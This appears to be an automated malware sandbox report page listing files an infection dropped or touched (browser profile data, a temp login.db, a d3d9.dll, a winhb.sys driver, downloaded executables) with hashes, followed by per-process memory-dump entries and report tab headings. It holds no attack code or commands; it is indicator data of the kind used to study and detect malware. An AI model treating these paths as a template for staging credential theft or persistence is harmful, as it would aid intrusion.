6a0935dcee81be6acf340b7e78ac653ac17d39b5d41d7b959bbc3a7f07c03440393b626eb91e78ac29eaa2f875c7d48b74af0a61c1e3f8e0f7cbdb1947672167

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
484570b5fc7ce6d6ce26d6be30a6d9a9

SHA1
1c52a4279f08284d6ed39268a0d1ee6b08f2c2df

SHA256
5f120e6e355b9f91073589455d50cc82f0206cb001993cbb3972e28fb87b6dc9

SHA512
b8dffc0a163bef2060fd82ae6b85c8dda0414ffe8c866f04f7894ea836b94ae31fcb2095a87e15ccda7966c3c34575bea994d618f1ac38b78677f992755a0519

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5afd4d.TMP

Filesize
538B

MD5
0c2f179820e7135b94f046a271210d9c

SHA1
06459d201c23f4b1c2a27c4a501134a90d5f9de8

SHA256
fe13879361df2db9376ee111bd4a7bb6fdb62c051d93fdc8a2cd15744bf57fca

SHA512
f0054fb3f32c5073048a643b2b0ebe26268fde0e7499c9f7236223b1fd059fcd53a20f4f904197730507fc83367176f0c159d48077fecd21e1502cd80188b08a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
407d169581acb633552cf8f87f413a47

SHA1
09e5acc4d3ae208bb6b2dc1c834dd1e782d818c9

SHA256
92cce4dfe17b8b0aa29317ed1adc3dc023bac0eacd0ce0834ca10ab902b53ca1

SHA512
7001603c1ba4f766fc831a9ea39bc10f9509389ca0f9262c6ffde1bb9eeaf28f990f958316834f6b1231f6766221dba43694779e11f141f59e598267df1cfa0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
96b83188f5d5482bd319ab46e5918871

SHA1
7658b6e86e99990227ad905c1fe7fa0eb87bea19

SHA256
f11da2692dc86e6d3e025329753cdf7698825544014270291f6c14c3bf327742

SHA512
8f6cc76087f6ddf00d349572ae5de344adafe6bc824aa286113f6754d63052f2ec35ba9ae0fdfd131ab5916b4cbd1998b9971cf5b39f56fd2fcb4c81d5a8e07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5f8fdd6d0636b9a76832ac0398f0e26d

SHA1
3fa7edad2d1da2b50eaddff3d9c26d8cd446500e

SHA256
6ea3291893d18601c6ecbe23c4e6483a9d172cee68394066551b222bedc4125f

SHA512
0c2662873d33a9c6dabc9f4357983c5f7ca8c85b01caa51f3be9e0c0db73926473015acbafed17031baafb4932913bfe2014fd22599ebac66a52a297e90bc0cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d487b6853777615298e77d08a638aa6d

SHA1
b3e6ab3cd55203e0e3d582d057166afe53da9b9b

SHA256
80860a35ec92f1bec5016ab67f6db02ed921a97a300ff021fb88e2c76fefd325

SHA512
0c72c6e2cb8efeb1f6d0d04309173873ca447f7bf65711af5b2781db5198b011624ebca713ea6cd71ebc915e71fe965ba7b806a27b5b4729a04e871a34f5a94e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
71e7ed134652362f0676acdc9c83c78f

SHA1
74aef03f1a34c31c91f56bd3e14edddfdc522d04

SHA256
5fb9a7ceec7bdefc62763444664fd3cf195fbeedbb5faba07cfe924f62d67690

SHA512
1dbe06207d46325614d8565f49eab8b52fc50010ba209f7b4aa36f63b063d039f942833a25ec46197339369bbfa83f8bf1fd322d00fc0a30b5bf5bbccce1ea5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ec3c199350acbd9f22318a70a37833ac

SHA1
4dfc4235321432dc992726a3804a95ac0a3a5604

SHA256
23ed1216f838c72d64ab3bf6096085aaba52925fc610b6bf0596ef453ddf3d66

SHA512
cea4111cac00e991f91344c44c9e814ee8b8970152402a1174b10c3eb80edada0a09cf4b4e09fadb20fa0aaad506b810303ec288d2f9ac0e67847cc8ec8c00f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7053b0edaedcb7d503190e6ca855529d

SHA1
eb7ea72b7057abb7921665bb400bf25ee83c2df3

SHA256
f8e984ca8e2c6733e6f5ec997679d97710cde8e354c8ae44ed28101a2e9998d3

SHA512
754827dc74f6c7dc59889fc0d4d897a54704a7a7adb586e892681fcc9a74278480cb5f866a47602615cc7ffbf8e865bcf486833f608dc8095f745a424245ec74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e0c333bb3f4879fc367f5174b433df32

SHA1
615d0ff1163cc810fc17476c1763e5fb9529e4a6

SHA256
ea42d7e1c0ecf5a2df077545cdf104f5c0eef212be3945cfbab9c57f395fc5e9

SHA512
f91482f52c890289734f98a24026d9fce0ff1e6b8b29f4cd67130de726dde2e121a2c0879adafa4eb77136cfaf7c4c1a99c657e26e39e7997da14aa385f94ed2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
6e0f85de5eae73bb51bcb0b193f3d51a

SHA1
eb22110bfc9483427e8960986eac82f7793079aa

SHA256
b9da52da3e91b45d8d4b2fa08ce3a4de5b1b6f9f5f918219b3b15bf14bf677ac

SHA512
a709fb5138b849d5af0689a55510de453e96f1d57b23d866a29eae08c5fd2a7ca6c9781d72208e87e2e955733292fc82701aaba74344bb1c1cb635f329a8cd0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
83b642bdc97c8bd976804ca067523713

SHA1
eb7ab29bdc9f9ddce475d5a4bc2aef160ed91e95

SHA256
3bb6c955afa5c6f07d9b2ffd4ee8ef5494e9bef6bdb85d9afd681e56f79bd4bf

SHA512
d6d507aeef88b065ed08517f1d0749de2a9e20317c90325d4137a87f16ab2ab4f55174e71fd3b563e41ed9929217846a6a7dfed43093c7afd27b5fed195198d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5tryhmg.default-release\activity-stream.discovery_stream.json.tmp

Filesize
19KB

MD5
1647b5c6c37e796c9e0346dba541196e

SHA1
9640497162f3f48d12e61d5453254af82a365e40

SHA256
110a444720af172f4a26de95c0bc55df4f2ecfeb7ddc035e7fc1b1319d5881e3

SHA512
f6c12d459d16c67e47fb67b59b7837b2d9e589abe6ddd36de97d0e1501520c0760c69ff899d6e1b184f23790b5897bcc97514e0d5954209caeb744d9cf2b924e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yiwvyfl1.00k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\login.db

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\logs\godot.log

Filesize
488B

MD5
de18c795cf104b602434278e74b0f2a4

SHA1
8aa8c41b12fee5fd328d6172a78a7d950389336c

SHA256
15d959cf30ff925cfcc521bf09fb1427be5abff7325916f559434a0355cbc967

SHA512
3224a4253631d1e6b770395bb4818d2ab65c0b0c7f0d35b9a42df5c46a62242c7a505235a8a70bf05a318d8a66b6c49c9430c7e071662af21ae21cb26cbfb6fb

Download Submit
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CanvasShaderGLES3\76b2d1b0b9c5ed46b9cc625f6b69a4c4f9d312acc58dec94ea5d16bcc59738b4\fa7b62523470356194bdf709eb2639ab149a07cc.cache

Filesize
128KB

MD5
d7baef1448ad14b4f870750ad8cefeb7

SHA1
8233aaf1054ed830f1e9e8e1ec58eac8984f6089

SHA256
e0c299bc0c12222e031440c8e1c66f9700b40f90736b6217e6bd63d73330088f

SHA512
a00bcc0da810e2f9ad5f0c519333c7ac8316015c30686f80c80eddbc2c809f66ddd96966a0421ab6a905e3c9c28bdcc99c8bc07be9a5c6fbdd59d2880c801f51

Download Submit
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CopyShaderGLES3\953afc36182527c02403e59c2f33b0079f04174127e3358b8caf8f4bf0de2445\fa7b62523470356194bdf709eb2639ab149a07cc.cache

Filesize
59KB

MD5
c76a5f559db8b59681462c52f87c944e

SHA1
fd3db2548fdb710feb82adaaa9d941cea8aa7d71

SHA256
272e6222abc24d1dc2b8c0a06a82bc59b8d604ad6c94ed955c8059d26715e4c2

SHA512
82028c101bf3154545ad09f820c7d24509b732a32ac45d6020688f9f39d355eb619718550e6e76ba9c733815f6eeefa7682d818167587912885dfdc4d8907209

Download Submit
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\EGL\a60yz_q3Wg_NqOe2amnSvYWvIdE=.cache

Filesize
5KB

MD5
f2ac940c80d80fc17bfdee28366c6178

SHA1
510e7949b42c9ce355f80e76b8264ea3620c995c

SHA256
0cd5939570798d7c65b900b22cc7542528d874f27d720e7ba49700db32204e89

SHA512
69d329493acddb368d1161f08fcf28a96cb94e450b19cd6052673f2b62b64c93c78d8c06156c36d840cc8687426bf14fb03a8dd7fd2a0eb429319da90189a53f

Download Submit
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\SceneShaderGLES3\91e25aaeff61f0bb8d1f98f7daab7b9e61f00f01bd40b8085f258b41ccb806dd\fa7b62523470356194bdf709eb2639ab149a07cc.cache

Filesize
343KB

MD5
bed852fd43779f384f98888997ba4e44

SHA1
60da8d76c831ad2ff698be028e29b526c0b7a219

SHA256
cbbe68e1e5c8335c857c4b2d41b7307afd449baedb921770009bbddfb5fa9986

SHA512
bbd2d7d390cb00dddf7f15020b679483176c3d12c618cdb201427922d148d92df3b6c627e9e332c90909983d43030e474db97a8ebbdd7e685fc3f9d8a9a1e9a8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
351B

MD5
e7a80adb8f43038209a8c48dbe71d6c6

SHA1
ca62cc737fcdd9d3581e6c93011635433122d5af

SHA256
ea43475d44b3657e27388928549acc3372ff221b2187747d0ecb6a2663bf176b

SHA512
6d0ce1840de16d0250100073e8725a886f81468e1df8f64f3d11b6ae55822edbe54f1dea2df7c6647115dea05f89d18dcb83a454c5684f7eb9c91a1b5a016645

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5tryhmg.default-release\AlternateServices.bin

Filesize
8KB

MD5
8a2817e7faeef75d9f2d7c8f322db847

SHA1
4f99f4eae4cc09cb3fce069b25e3ff454f74825e

SHA256
b5f07b2502a774919fbfc48700140e19826f11c94f028e286c5022a0ea80a7d2

SHA512
87aa12bd75efc262151ccfa6603c6acf939234658243824ff845074019c17c77a5dc4a3690295b7ba20d81226a4ae04bdcbce3dac52314f1d9b84197138b8549

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5tryhmg.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
004727c0ee7a06d6ffd0e4c9e1a7aee8

SHA1
1e62cb5fc615c35100dbdd8ee5da6921430596af

SHA256
45c561423fa68a41bab5dabba3bc8527f04d0ea9573b4ebd6a35af67cbd8973d

SHA512
45434e46e0dd4197400c131b6cfcb0edead823cf5dd6e6fdf87b47259ed89cff84e0ce25b64b382baab087848b56e9d856156aeca7d63607e295fee7a7a0a671

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5tryhmg.default-release\datareporting\glean\db\data.safe.tmp

Filesize
23KB

MD5
b7da034f5a1041e62936eb1fa314aa26

SHA1
718d7111241b9f1aeed1b4986dae9cb24e96cb83

SHA256
6c0f267cb248d12a258a6d2b55b2aafb3340298d9257fdef51aed1eabb9096cb

SHA512
968c190b9bdb263cf7d7a7294f070bfaf78c59d491ab445d486c3aea22e119e6b97f70432faf780a3f3fa85b8035f5e7f6d6380dbbb202450e8649c2e10b695b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5tryhmg.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
45c0569ea1515339a4b073c939b6c4b4

SHA1
c710bb4ea002469477167ca9dae77226cfa9f760

SHA256
38ac3ac1c0bb188bd488f90a200b5695b82c1d1331af6ba8d6489985820bd739

SHA512
73abfd96c7c663660da1a61df461ccce18aa9f1afc3f6e3bf5e477de6f3c91c59938d1c4ee2e5f5c2995a32a44ab8f9bd6ab6d4f5241fbfedd7eee986430e11c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5tryhmg.default-release\datareporting\glean\pending_pings\2eec76f2-f7b6-4204-9081-82753eb0ce9d

Filesize
659B

MD5
e4dfd5b6f75f478bddffa1e1b9a11e2c

SHA1
98af3343bab4cb44d40b1ace80ad266be55a5e7b

SHA256
49fb3834dd21214a2eeccd67db817ec5602176418f0695f7130dd20146982294

SHA512
a3421b99feceff073da9ffc852a1dcf1de8e800cd1066a54d5c955b8290ca56d7e083270e071449c4c95a31cdb1111a69e5f2b69c90da662912f3bcf80228fd0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5tryhmg.default-release\datareporting\glean\pending_pings\548396fe-6356-47be-89c4-a9e008204c5e

Filesize
982B

MD5
145f5b03c6d1f135e15ee897d19fbc6d

SHA1
2ef92eabbd9fb91723dc973b04bfca3c4efa94c1

SHA256
2e4bc3261060fcd6f5818ec8d1361918367b3d2eee57bb2f13c58122101aebe8

SHA512
19d2c532a1b4c7ce8726aaa4c46f824d7084eee5bd897d5a78071c6f6e4f85c1aae48e575fa87b404f35e955eee5f20c73c7cbae6919d875decc4ecc2b2fb60c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5tryhmg.default-release\prefs-1.js

Filesize
10KB

MD5
acf0deee3c8b683d37e9dfdd2dc26d1c

SHA1
754927e29b683c2271d15168fbe5804ddf628656

SHA256
6e0dd235b084877f01b152fb1098c0481172943113464bdae14225f680c12e4c

SHA512
ccb2e974fc99a1027a33ab449e195e1f8a4c6b388e0c8a3aba0e4403cec82701219ac92835e006ad0aca225b803b0772f45a81355aaba92d26e08d5c23709a6e

Download Submit
C:\Users\Admin\AppData\Roaming\d3d9.dll

Filesize
437KB

MD5
106fe1980dbcb4fa2fe0c00b6d6fa7c2

SHA1
5cb7eb7be8f3d1641cb458024d868363658a2955

SHA256
c0716389100b55b09f46fafef37bb7d120453df3bfb1097dcd30e14bb97c09bc

SHA512
c9d48c5f5ecf83012f1cc16581b7bb283265a3808847af46195987c7b0721116fe7241185d67b5d7636080881da5f18df04e57e309ff5a133046dd87ca8d06ce

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 590559.crdownload

Filesize
16.9MB

MD5
b173c68e688897678e7627dcdef5dc89

SHA1
eb1654e6ea524defeb553c3ed7bf587e6c5be807

SHA256
b2060105511f416e00ed9a9fbc37871a88b70cf9d6dcd792b89bf533076f6354

SHA512
593d0a89fd68b86d14bed7bd26cdee4fa6509478b966cae057cb535229ef7baf6966a239221fdb4d2da82b05d5e352b49d3b4de80f663112f04e795956604115

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 899499.crdownload

Filesize
41KB

MD5
afbb43b44b95fecee1d017414031254b

SHA1
d9546073e6a5da4b684ce8e86cef8bfb2354f18a

SHA256
d09bafb8d1a2c81142d5ebc9d259810e731a645774f6a0967dfcc18e32ca7dd6

SHA512
9e7453b66c83cafc9f0c0fc46cd17568a80e84793f7c6f28d21c8236ca16cd549ff8f1383e1b20dccbce26dd4f48a60ac3a43187f0c452412e1aee232a1bbdc2

Download Submit
C:\Users\Admin\Downloads\nb3ce1n9msom.rar:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\sbHBAhjbsa.exe:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2899}\favicon1.ico

Filesize
110KB

MD5
e1ba104fdd67df672adbc27ff2f6c530

SHA1
d183bd4a93c88904b51e0070dc41e62011d9088c

SHA256
86f0c543ab756a7c130141db1dbf58a070f56bb95dbb77b528eaa98769684af4

SHA512
4f63dbf86f74f03300d138c28b58937320816bf3823cf12e1aed87e93583d6adf9369b3aaadb17f17e232d9351a8022992051baed55f4ce4940516f3e9ea0247

Download Submit
C:\Windows\System32\drivers\winhb.sys

Filesize
2.6MB

MD5
607fa999176aff89978996e3a9cb27e3

SHA1
f3b2422c7a4742069ecf4a9eaab742cbcb1f5f21

SHA256
ee1700af169adab64827080f604e9818cdd7d4672e7d66da137f00681e4e0c38

SHA512
841469b4364d4120252b52162c80060eb145857c87373fb41d4558d2ed9e78d0ecd54e5b80670aa548e120cb70db1710992d9c32b5db5a39ba9d0a3855403b93

Download Submit
memory/440-2367-0x00007FF68BDA0000-0x00007FF690102000-memory.dmp

Filesize
67.4MB

Download
memory/448-2444-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/448-2442-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/448-2445-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/448-2443-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/448-2448-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/448-2441-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1172-2345-0x0000028A57490000-0x0000028A574B2000-memory.dmp

Filesize
136KB

Download
memory/2100-2754-0x00007FF68BDA0000-0x00007FF690102000-memory.dmp

Filesize
67.4MB

Download
memory/2248-2484-0x00000000054E0000-0x00000000054F2000-memory.dmp

Filesize
72KB

Download
memory/2248-2469-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2248-2497-0x0000000006F90000-0x0000000007152000-memory.dmp

Filesize
1.8MB

Download
memory/2248-2498-0x0000000007690000-0x0000000007BBC000-memory.dmp

Filesize
5.2MB

Download
memory/2248-2499-0x0000000007160000-0x00000000071B0000-memory.dmp

Filesize
320KB

Download
memory/2248-2483-0x0000000005DE0000-0x0000000005EEA000-memory.dmp

Filesize
1.0MB

Download
memory/2248-2472-0x0000000005360000-0x00000000053F2000-memory.dmp

Filesize
584KB

Download
memory/2248-2473-0x0000000005400000-0x000000000540A000-memory.dmp

Filesize
40KB

Download
memory/2248-2482-0x0000000006400000-0x0000000006A18000-memory.dmp

Filesize
6.1MB

Download
memory/2248-2496-0x0000000005EF0000-0x0000000005F56000-memory.dmp

Filesize
408KB

Download
memory/2248-2487-0x00000000056A0000-0x00000000056EC000-memory.dmp

Filesize
304KB

Download
memory/2248-2471-0x0000000005830000-0x0000000005DD6000-memory.dmp

Filesize
5.6MB

Download
memory/2248-2486-0x0000000005660000-0x000000000569C000-memory.dmp

Filesize
240KB

Download
memory/2276-2564-0x000002687CBE0000-0x000002687CC93000-memory.dmp

Filesize
716KB

Download
memory/2864-6-0x00007FFD86820000-0x00007FFD872E2000-memory.dmp

Filesize
10.8MB

Download
memory/2864-2-0x00007FFD86820000-0x00007FFD872E2000-memory.dmp

Filesize
10.8MB

Download
memory/2864-0-0x00007FFD86823000-0x00007FFD86825000-memory.dmp

Filesize
8KB

Download
memory/2864-1-0x00000000005A0000-0x00000000005B0000-memory.dmp

Filesize
64KB

Download
memory/2912-2523-0x00007FFD64D80000-0x00007FFD64D90000-memory.dmp

Filesize
64KB

Download
memory/2912-2584-0x00007FFD675D0000-0x00007FFD675E0000-memory.dmp

Filesize
64KB

Download
memory/2912-2585-0x00007FFD675D0000-0x00007FFD675E0000-memory.dmp

Filesize
64KB

Download
memory/2912-2586-0x00007FFD675D0000-0x00007FFD675E0000-memory.dmp

Filesize
64KB

Download
memory/2912-2587-0x00007FFD675D0000-0x00007FFD675E0000-memory.dmp

Filesize
64KB

Download
memory/2912-2524-0x00007FFD64D80000-0x00007FFD64D90000-memory.dmp

Filesize
64KB

Download
memory/2912-2521-0x00007FFD675D0000-0x00007FFD675E0000-memory.dmp

Filesize
64KB

Download
memory/2912-2522-0x00007FFD675D0000-0x00007FFD675E0000-memory.dmp

Filesize
64KB

Download
memory/2912-2518-0x00007FFD675D0000-0x00007FFD675E0000-memory.dmp

Filesize
64KB

Download
memory/2912-2519-0x00007FFD675D0000-0x00007FFD675E0000-memory.dmp

Filesize
64KB

Download
memory/2912-2520-0x00007FFD675D0000-0x00007FFD675E0000-memory.dmp

Filesize
64KB

Download
memory/3108-2463-0x00000000025B0000-0x00000000025B6000-memory.dmp

Filesize
24KB

Download
memory/3108-2462-0x0000000000030000-0x00000000000C8000-memory.dmp

Filesize
608KB

Download
memory/3908-2596-0x00007FF68BDA0000-0x00007FF690102000-memory.dmp

Filesize
67.4MB

Download
memory/3908-2500-0x00007FF68BDA0000-0x00007FF690102000-memory.dmp

Filesize
67.4MB

Download
memory/3908-2412-0x00007FF68BDA0000-0x00007FF690102000-memory.dmp

Filesize
67.4MB

Download
memory/3908-2536-0x00007FF68BDA0000-0x00007FF690102000-memory.dmp

Filesize
67.4MB

Download
memory/3908-2391-0x00007FF68BDA0000-0x00007FF690102000-memory.dmp

Filesize
67.4MB

Download
memory/4004-2451-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2460-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2452-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2453-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2454-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2455-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2456-0x00000139127E0000-0x0000013912800000-memory.dmp

Filesize
128KB

Download
memory/4004-2598-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2457-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2450-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2597-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2458-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2449-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2459-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4004-2461-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4620-2438-0x000001A9C4690000-0x000001A9C4696000-memory.dmp

Filesize
24KB

Download
memory/4620-2433-0x000001A9C4640000-0x000001A9C464A000-memory.dmp

Filesize
40KB

Download
memory/4620-2431-0x000001A9C4560000-0x000001A9C457C000-memory.dmp

Filesize
112KB

Download
memory/4620-2434-0x000001A9C4670000-0x000001A9C468C000-memory.dmp

Filesize
112KB

Download
memory/4620-2436-0x000001A9C46B0000-0x000001A9C46CA000-memory.dmp

Filesize
104KB

Download
memory/4620-2435-0x000001A9C4650000-0x000001A9C465A000-memory.dmp

Filesize
40KB

Download
memory/4620-2439-0x000001A9C46A0000-0x000001A9C46AA000-memory.dmp

Filesize
40KB

Download
memory/4620-2437-0x000001A9C4660000-0x000001A9C4668000-memory.dmp

Filesize
32KB

Download
memory/4620-2432-0x000001A9C4580000-0x000001A9C4633000-memory.dmp

Filesize
716KB

Download
memory/4744-3251-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/4744-3250-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/4744-3253-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/4744-3252-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/4744-3288-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/4744-3289-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/5116-2767-0x00007FF68BDA0000-0x00007FF690102000-memory.dmp

Filesize
67.4MB

Download
memory/6440-3130-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/6440-3187-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/6440-3169-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/6440-3143-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/6440-3142-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/6440-3141-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/6440-3140-0x0000000140000000-0x00000001425D4000-memory.dmp

Filesize
37.8MB

Download
memory/6972-3482-0x0000000140000000-0x0000000141000000-memory.dmp

Filesize
16.0MB

Download
memory/6972-3504-0x0000000140000000-0x0000000141000000-memory.dmp

Filesize
16.0MB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads